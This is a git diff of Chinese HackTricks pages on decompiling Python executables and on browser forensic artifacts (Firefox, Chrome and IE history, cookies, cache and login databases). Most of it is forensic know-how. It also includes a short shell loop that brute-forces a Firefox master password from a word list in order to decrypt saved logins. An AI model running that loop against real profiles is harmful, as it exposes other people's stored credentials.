* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)。
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果你想在**HackTricks上看到你的公司广告**或者**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。
</details>
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
如果你对**黑客职业**感兴趣,并且想要黑入不可黑的系统 - **我们正在招聘!**_需要流利的波兰语书写和口语_
@ -39,7 +41,7 @@ pyi-archive_viewer <binary>
? X binary_name
to filename? /tmp/binary.pyc
```
在一个**python exe二进制文件**中,你可以通过运行以下命令来**获取.pyc文件**
在一个**python exe 二进制文件**中,你可以通过运行以下命令来**获取 .pyc 文件**
```bash
python pyinstxtractor.py executable.exe
```
@ -66,7 +68,7 @@ Unknown magic number 227 in /tmp/binary.pyc
>> imp.get_magic().hex()
'550d0d0a'
```
**魔数**在这个案例中对于python3.8是**`0x550d0d0a`**,然后,为了修复这个错误,你需要在**.pyc文件**的**开头** **添加**以下字节:`0x0d550a0d000000000000000000000000`
**魔数**在这个例子中对于python3.8是**`0x550d0d0a`**,然后,要修复这个错误,你需要在**.pyc文件**的**开头****添加**以下字节:`0x0d550a0d000000000000000000000000`
**一旦**你**添加**了那个魔数头部,**错误应该会被修复。**
@ -80,7 +82,7 @@ hexdump 'binary.pyc' | head
```
### 错误:反编译通用错误
**其他错误** 如:`class 'AssertionError'>; co_code 应该是以下类型之一 (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); 现在是 <class 'NoneType'>` 可能会出现。
**其他错误** 如:`class 'AssertionError'>; co_code 应该是以下类型之一 (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); 实际类型为 <class 'NoneType'>` 可能会出现。
这可能意味着你**没有正确添加**魔术数字,或者你没有**使用**正确的魔术数字,所以请**确保你使用了正确的魔术数字**(或尝试一个新的)。
@ -90,11 +92,11 @@ hexdump 'binary.pyc' | head
工具 [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) 将社区可用的几个工具结合起来,**帮助研究人员解包和反编译**用python编写的可执行文件py2exe 和 pyinstaller
有几个YARA规则可用于确定可执行文件是否用python编写此脚本还确认可执行文件是否py2exe或pyinstaller创建
有几个YARA规则可用于确定可执行文件是否用python编写此脚本还确认可执行文件是否py2exe或pyinstaller创建
### ImportError文件名'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' 不存在
目前使用unpy2exe或pyinstxtractor时我们得到的Python字节码文件可能不完整因此它**无法被uncompyle6识别以获取纯Python源代码**。这是由于缺少Python**字节码版本号**造成的。因此我们加入了一个prepend选项这将在其中包含一个Python字节码版本号帮助简化反编译过程。当我们尝试使用uncompyle6来反编译.pyc文件时它返回一个错误。然而**一旦我们使用了prepend选项我们可以看到Python源代码已经成功地被反编译**。
目前使用unpy2exe或pyinstxtractor时我们得到的Python字节码文件可能不完整进而**无法被uncompyle6识别以获取纯Python源代码**。这是由于缺少Python**字节码版本号**造成的。因此我们加入了一个prepend选项这将在其中包含一个Python字节码版本号有助于简化反编译过程。当我们尝试使用uncompyle6来反编译.pyc文件时返回一个错误。然而,**一旦我们使用了prepend选项我们可以看到Python源代码已经成功反编译**。
```
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
Traceback (most recent call last):
@ -112,7 +114,7 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
```
## 分析Python汇编
如果您按照前面的步骤未能提取Python的“原始”代码那么您可以尝试**提取** **汇编**代码(但是**它不是很描述性**,所以**尝试**再次提取原始代码)。在[这里](https://bits.theorem.co/protecting-a-python-codebase/),我找到了一个非常简单的代码来**反汇编** _.pyc_ 二进制文件祝您好运理解代码流程。如果_.pyc_是来自python2请使用python2
如果您按照前面的步骤未能提取Python的“原始”代码那么您可以尝试**提取** **汇编**代码(但是**它不是很描述性**,所以**尝试**再次提取原始代码)。在[这里](https://bits.theorem.co/protecting-a-python-codebase/),我找到了一个非常简单的代码来**反汇编** _.pyc_ 二进制文件(祝您好运理解代码流程)。如果 _.pyc_ 是来自python2请使用python2
```bash
>>> import dis
>>> import marshal
@ -162,7 +164,7 @@ True
### 使用 py2exe 创建有效载荷:
1. 从 [http://www.py2exe.org/](http://www.py2exe.org) 安装 py2exe 包。
2. 对于有效载荷(在此例中,我们将其命名为 hello.py使用类似图 1 中的脚本。选项 “bundle_files” 的值为 1 会将包括 Python 解释器在内的所有内容打包进一个 exe 文件。
2. 对于有效载荷(在此例中,我们将其命名为 hello.py使用类似图 1 中的脚本。选项 “bundle\_files” 的值为 1 会将包括 Python 解释器在内的所有内容打包进一个 exe 文件。
3. 脚本准备好后,我们将执行命令 “python setup.py py2exe”。这将创建可执行文件就像图 2 中展示的那样。
```
from distutils.core import setup
@ -211,20 +213,22 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
如果你对**黑客职业**感兴趣,并且想要黑掉那些不可黑的东西 - **我们正在招聘!**_需要流利的波兰语书写和口语_
如果你对**黑客职业**感兴趣,并且想要黑进那些不可黑的系统 - **我们正在招聘!**_需要流利的波兰语书写和口语_
{% embed url="https://www.stmcyber.com/careers" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在**网络安全公司**工作吗?你想在**HackTricks**中看到你的**公司广告**吗?或者你想要获得**PEASS最新版本或下载HackTricks的PDF**吗?查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏
* 获取[**官方的PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
其他支持HackTricks的方式
* 如果你想在**HackTricks上看到你的公司广告**或者**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享你的黑客技巧**。
</details>

278
forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
View file

@ -1,90 +1,93 @@
# 浏览器遗留痕迹
# 浏览器工件
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客攻击</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者你想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进的**社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 浏览器遗留痕迹 <a href="#3def" id="3def"></a>
## 浏览器工件 <a href="#3def" id="3def"></a>
当我们谈论浏览器遗留痕迹时,我们指的是浏览历史、书签、下载文件列表、缓存数据等。
当我们谈论浏览器工件时,我们指的是浏览历史、书签、下载文件列表、缓存数据等。
这些遗留痕迹是存储在操作系统特定文件夹中的文件。
这些工件是存储在操作系统特定文件夹中的文件。
每个浏览器将其文件存储在与其他浏览器不同的位置,并且它们都有不同的名称,但它们(大多数情况下)存储相同类型的数据(遗留痕迹)。
每个浏览器将其文件存储在与其他浏览器不同的位置,它们都有不同的名称,但它们都存储(大多数时候)相同类型的数据(工件)。
让我们来看看浏览器存储的最常见的遗留痕迹
让我们来看看浏览器存储的最常见工件
* **浏览历史:** 包含用户的浏览历史数据。可以用于追踪用户是否访问过某些恶意网站。
* **自动完成数据:** 这是浏览器根据您最常搜索的内容提供的数据。可以与浏览历史一起使用,以获取更多的洞察力
* **浏览历史:** 包含用户的浏览历史数据。例如,可以用来追踪用户是否访问了一些恶意网站。
* **自动完成数据:** 这是浏览器根据您最常搜索的内容提出的建议数据。可以与浏览历史一起使用以获得更多见解
* **书签:** 不言自明。
* **扩展和插件:** 不言自明。
* **缓存:** 在浏览网站时浏览器会为许多原因创建各种缓存数据图像、JavaScript 文件等),例如加快网站的加载时间。这些缓存文件在取证调查中可以成为重要的数据来源。
* **缓存:** 浏览网站时浏览器会创建各种缓存数据图片、javascript文件等出于多种原因。例如加快网站的加载时间。这些缓存文件在取证调查中可能是数据的重要来源。
* **登录信息:** 不言自明。
* **网站图标:** 它们是在选项卡、URL、书签等处找到的小图标。它们可以用作获取有关网站或用户访问过的位置的更多信息的另一个来源。
* **Favicons** 它们是在标签页、URL、书签等中找到的小图标。它们可以作为获取有关网站或用户访问地点的更多信息的另一个来源。
* **浏览器会话:** 不言自明。
* **下载:** 不言自明。
* **表单数据:** 浏览器通常会存储在表单中输入的任何内容,以便在用户下次输入表单时,浏览器可以提供先前输入的数据。
* **表单数据:** 浏览器通常会存储在表单中键入的任何内容,所以下次用户在表单中输入内容时,浏览器可以建议之前输入的数据。
* **缩略图:** 不言自明。
* **自定义字典.txt** 用户添加到字典中的单词。
## Firefox
Firefox 在 \~/_**.mozilla/firefox/**_Linux中创建配置文件文件夹**/Users/$USER/Library/Application Support/Firefox/Profiles/**MacOS中创建配置文件文件夹_**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_Windows中创建配置文件文件夹。\
此文件夹中,应该出现名为 _**profiles.ini**_ 的文件,其中包含用户配置文件的名称。\
每个配置文件都有一个 "**Path**" 变量,其中包含其数据将存储的文件夹的名称。该文件夹应该**位于与 \_profiles.ini**\_\*\* 相同的目录中\*\*。如果不存在,则可能已被删除。
Firefox在\~/_**.mozilla/firefox/**_Linux、**/Users/$USER/Library/Application Support/Firefox/Profiles/**MacOS_**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_Windows中创建配置文件文件夹。\
这个文件夹中应该会出现名为_**profiles.ini**_的文件,其中包含用户配置文件的名称。\
每个配置文件都有一个“**Path**”变量,指示其数据将被存储的文件夹名称。该文件夹应该**存在于\_profiles.ini**\_\*\*所在的同一目录中\*\*。如果不存在,那么可能已被删除。
在每个配置文件的文件夹_\~/.mozilla/firefox/\<ProfileName>/_您应该能够找到以下有趣的文件
在每个配置文件的文件夹_\~/.mozilla/firefox/\<ProfileName>/_路径中,您应该能够找到以下有趣的文件:
* _**places.sqlite**_历史记录moz\_\_places、书签moz\_bookmarks和下载文件moz\_\_annos。在 Windows 上,可以使用工具[BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html)来读_**places.sqlite**_ 中的历史记录。
* 转储历史记录的查询`select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;`
* 注意链接类型是一个指示数字,表示:
* 1用户点击链接
* 2用户输入 URL
* _**places.sqlite**_历史记录moz_places、书签moz_bookmarks和下载moz_annos。在Windows中,可以使用工具[BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html)来读_**places.sqlite**_中的历史记录。
* 查询转储历史记录:`select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;`
* 注意链接类型是一个数字,表示:
* 1用户跟随链接
* 2用户输入URL
* 3用户使用收藏夹
* 4从 iframe 加载
* 5通过 HTTP 重定向 301 访问
* 6通过 HTTP 重定向 302 访问
* 4通过Iframe加载
* 5通过HTTP重定向301访问
* 6通过HTTP重定向302访问
* 7下载文件
* 8用户在 iframe 中点击链接
* 转储下载文件的查询`SELECT datetime(lastModified/1000000,'unixepoch') AS down_date, content as File, url as URL FROM moz_places, moz_annos WHERE moz_places.id = moz_annos.place_id;`
* 8用户在Iframe中跟随链接
* 查询转储下载:`SELECT datetime(lastModified/1000000,'unixepoch') AS down_date, content as File, url as URL FROM moz_places, moz_annos WHERE moz_places.id = moz_annos.place_id;`
*
* _**bookmarkbackups/**_:书签备份
* _**formhistory.sqlite**_**Web 表单数据**如电子邮件)
* _**handlers.json**_:协议处理程序(例如,哪个应用程序将处理 _mailto://_ 协议)
* _**persdict.dat**_用户添加到字典中的单词
* _**addons.json**__**extensions.sqlite**_:已安装的插件和扩展
* _**cookies.sqlite**_:包含**Cookie**。在 Windows 上,可以使用[MZCookiesView](https://www.nirsoft.net/utils/mzcv.html)来检查此文件。
* _**cache2/entries**__**startupCache**_:缓存数据(约 350MB。还可以使用数据刻录等技巧来获取缓存中保存的文件。可以使用[MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html)来查看缓存中保存的文件。
* _**formhistory.sqlite**_**Web表单数据**(如电子邮件)
* _**handlers.json**_协议处理程序例如哪个应用程序将处理_mailto://_协议
* _**persdict.dat**_:添加到字典中的单词
* _**addons.json**_和\_**extensions.sqlite**\_:已安装的插件和扩展
* _**cookies.sqlite**_:包含**cookies。**在Windows中可以使用[**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html)来检查这个文件。
* _**cache2/entries**_或_**startupCache**_缓存数据约350MB。像**数据雕刻**这样的技巧也可以用来获取缓存中保存的文件。可以使用[MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html)来查看**缓存中保存的文件**
可以获的信息:
可以获的信息:
* URL、获取次数、文件名、内容类型、文件大小、上次修改时间、上次获取时间、服务器上的最后修改时间、服务器响应
* _**favicons.sqlite**_网站图标
* _**prefs.js**_:设置和首选项
* _**downloads.sqlite**_:旧下载数据库(现在已经在places.sqlite中
* URL、获取次数、文件名、内容类型、文件大小、最后修改时间、最后获取时间、服务器最后修改时间、服务器响应
* _**favicons.sqlite**_Favicons
* _**prefs.js**_:设置和偏好
* _**downloads.sqlite**_旧下载数据库现在在places.sqlite中
* _**thumbnails/**_:缩略图
* _**logins.json**_:加密的用户名和密码
* **浏览器内置的反钓鱼功能:** `grep 'browser.safebrowsing' ~/Library/Application Support/Firefox/Profiles/*/prefs.js`
* 如果安全搜索设置已被禁用则返回“safebrowsing.malware.enabled”和“phishing.enabled”为false
* _**key4.db**_ _**key3.db**_:主密钥?
* **浏览器内置的反网络钓鱼功能:** `grep 'browser.safebrowsing' ~/Library/Application Support/Firefox/Profiles/*/prefs.js`
* 如果已禁用安全搜索设置,则返回“safebrowsing.malware.enabled”和“phishing.enabled”为false
* _**key4.db**_或_**key3.db**_主密钥
要尝试解密主密码,您可以使用[https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)中的以下脚本和调用来指定密码文件进行暴力破解:
尝试解密主密码,您可以使用[https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
使用以下脚本和调用,您可以指定一个密码文件进行暴力破解:
{% code title="brute.sh" %}
```bash
@ -97,189 +100,196 @@ echo "Trying $pass"
echo "$pass" | python firefox_decrypt.py
done < $passfile
```
```markdown
{% endcode %}
![](<../../../.gitbook/assets/image (417).png>)
## Google Chrome
Google Chrome在用户的主目录下创建配置文件路径为_**\~/.config/google-chrome/**_Linux_**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_Windows或者_**/Users/$USER/Library/Application Support/Google/Chrome/**_MacOS。大部分信息保存在之前提到的路径下的_Default/_或者_ChromeDefaultData/_文件夹中。在这里你可以找到以下有趣的文件
Google Chrome 在用户的主目录 _**\~/.config/google-chrome/**_ (Linux)、_**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows) 或 _**/Users/$USER/Library/Application Support/Google/Chrome/**_ (MacOS) 中创建配置文件。\
大部分信息将保存在前面路径中的 _**Default/**__**ChromeDefaultData/**_ 文件夹内。在这里,你可以找到以下有趣的文件:
* _**History**_URL、下载记录甚至搜索关键词。在Windows中你可以使用工具[ChromeHistoryView](https://www.nirsoft.net/utils/chrome\_history\_view.html)来查看历史记录。"Transition Type"列的含义如下
* Link用户点击了链接
* Typed输入了URL
* Auto Bookmark
* Auto Subframe添加
* Start page主页
* Form Submit填写并发送了表单
* Reloaded
* _**Cookies**_Cookies。可以使用[ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html)来检查Cookies。
* _**Cache**_缓存。在Windows中可以使用工具[ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html)来检查缓存。
* _**History**_URL、下载甚至搜索关键词。在 Windows 中,你可以使用工具 [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) 来阅读历史记录。"Transition Type" 列的含义
* Link: 用户点击了链接
* Typed: URL 被输入
* Auto Bookmark
* Auto Subframe: 添加
* Start page: 主页
* Form Submit: 表单被填写并发送
* Reloaded
* _**Cookies**_Cookies。可以使用 [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) 来检查 cookies。
* _**Cache**_:缓存。在 Windows 中,可以使用工具 [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) 来检查缓存。
* _**Bookmarks**_:书签
* _**Web Data**_:表单历史
* _**Favicons**_:网站图标
* _**Login Data**_:登录信息(用户名、密码等)
* _**Current Session**_和_**Current Tabs**_当前会话数据和当前标签页
* _**Last Session**_和_**Last Tabs**_这些文件保存了在关闭Chrome时活动的网站。
* _**Current Session**_ _**Current Tabs**_:当前会话数据和当前标签页
* _**Last Session**__**Last Tabs**_:这些文件保存了上次关闭 Chrome 时活跃的网站。
* _**Extensions**_:扩展和插件文件夹
* **Thumbnails**:缩略图
* **Preferences**该文件包含了大量有用的信息如插件、扩展、使用地理位置的网站、弹出窗口、通知、DNS预取、证书异常等。如果你想研究某个特定的Chrome设置是否启用,你很可能会在这里找到该设置。
* **浏览器内置的反钓鱼功能**`grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
* 你可以简单地使用grep搜索“**safebrowsing**”,并在结果中查找`{"enabled: true,"}`来表示反钓鱼和恶意软件保护已开启。
* **Preferences**此文件包含大量有用信息如插件、扩展、使用地理位置的网站、弹出窗口、通知、DNS 预取、证书例外等等。如果你正在研究是否启用了特定的 Chrome 设置,你很可能会在这里找到该设置。
* **浏览器内置的反钓鱼功能** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
* 你可以简单地搜索 "**safebrowsing**" 并在结果中查找 `{"enabled: true,"}` 来指示反钓鱼和恶意软件保护已开启。
## **SQLite数据库数据恢复**
## **SQLite DB 数据恢复**
正如前面的章节所示Chrome和Firefox都使用**SQLite**数据库来存储数据。可以使用工具[**sqlparse**](https://github.com/padfoot999/sqlparse)或者[**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases)来**恢复已删除的条目**
如前面章节所述Chrome 和 Firefox 都使用 **SQLite** 数据库来存储数据。可以使用工具 [**sqlparse**](https://github.com/padfoot999/sqlparse) **或** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases) **恢复已删除的条目**
## **Internet Explorer 11**
Internet Explorer将**数据**和**元数据**存储在不同的位置。元数据可以帮助找到数据。
Internet Explorer 在不同位置存储 **数据****元数据**。元数据将帮助找到数据。
元数据可以在文件夹`%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data`中找到其中VX可以是V01、V16或V24。在上述文件夹中还可以找到文件V01.log。如果此文件的**修改时间**与WebcacheVX.data文件的**不同**,可能需要运行命令`esentutl /r V01 /d`来**修复**可能的**不兼容性**。
**元数据** 可以在文件夹 `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` 中找到,其中 VX 可能是 V01、V16 或 V24。\
在上述文件夹中,你还可以找到 V01.log 文件。如果这个文件和 WebcacheVX.data 文件的 **修改时间** **不同**,你可能需要运行命令 `esentutl /r V01 /d`**修复** 可能的 **不兼容问题**
一旦**恢复**了这个工件它是一个ESE数据库可以使用photorec工具并选择Exchange Database或EDB选项来恢复你可以使用程序[ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html)来打开它。打开后,转到名为“**Containers**”的表。
一旦 **恢复** 了这个工件(它是一个 ESE 数据库photorec 可以使用 Exchange Database 或 EDB 选项来恢复它),你可以使用程序 [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) 来打开它。一旦 **打开**,转到名为 "**Containers**" 的表。
![](<../../../.gitbook/assets/image (446).png>)
在这个表中,你可以找到存储信息的每个部分保存在哪些其他表或容器中。然后,你可以找到浏览器存储的数据的位置以及其中的元数据
在这个表内,你可以找到存储信息的其他表或容器的位置。接下来,你可以找到浏览器存储的 **数据位置** 和其中的 **元数据**
**请注意此表还指示了其他Microsoft工具如Skype的缓存元数据**
**注意,这个表也指示了其他 Microsoft 工具(例如 skype缓存的元数据**
### 缓存
可以使用工具[IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html)来检查缓存。你需要指定提取缓存数据的文件夹。
你可以使用工具 [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) 来检查缓存。你需要指定你提取缓存日期的文件夹。
#### 元数据
关于缓存的元数据存储了以下信息:
关于缓存的元数据信息包括
* 文件名
* SecureDIrectory:缓存目录中文件的位置
* AccessCount:文件在缓存中保存的次数
* URL:原始URL
* CreationTime:缓存的第一次时间
* AccessedTime:缓存使用的时间
* ModifiedTime:最后的网页版本
* ExpiryTime缓存过期的时间
* 磁盘上的文件名
* SecureDIrectory: 文件在缓存目录中的位置
* AccessCount: 它被保存在缓存中的次数
* URL: 原始 URL
* CreationTime: 第一次被缓存的时间
* AccessedTime: 使用缓存的时间
* ModifiedTime: 网页的最后版本
* ExpiryTime: 缓存过期的时间
#### 文件
缓存信息可以在_**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_和_**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_中找到
缓存信息可以在 _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ 中找到
这些文件夹中的信息是用户所看到的页面的**快照**。缓存的大小为**250 MB**时间戳指示了页面的访问时间第一次访问时间、NTFS的创建日期、最后一次访问时间、NTFS的修改时间)。
这些文件夹内的信息是 **用户所看到的快照**。缓存的大小为 **250 MB**时间戳表明了页面被访问的时间第一次NTFS 的创建日期最后一次NTFS 的修改时间)。
### Cookies
可以使用工具[IECookiesView](https://www.nirsoft.net/utils/iecookies.html)来检查Cookies。你需要指定提取Cookies的文件夹。
你可以使用工具 [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) 来检查 cookies。你需要指定你提取 cookies 的文件夹。
#### **元数据**
关于Cookies的元数据存储了以下信息
存储的 cookies 的元数据信息包括
* 文件系统中的Cookie名称
* 文件系统中的 Cookie 名称
* URL
* AccessCountCookie发送到服务器的次数
* CreationTimeCookie的创建时间
* ModifiedTimeCookie的最后修改时间
* AccessedTimeCookie的最后访问时间
* ExpiryTimeCookie的过期时间
* AccessCount: cookies 被发送到服务器的次数
* CreationTime: Cookie 第一次创建的时间
* ModifiedTime: Cookie 最后一次被修改的时间
* AccessedTime: Cookie 最后一次被访问的时间
* ExpiryTime: Cookie 过期的时间
#### 文件
Cookies数据可以在_**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_和_**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_中找到。
Cookies 数据可以在 _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**__**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ 中找到
会话 cookies 将驻留在内存中,持久 cookies 在磁盘上。
会话Cookie存储在内存中持久Cookie存储在磁盘中。
### 下载
#### **元数据**
检查工具[ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html),您可以找到包含下载元数据的容器:
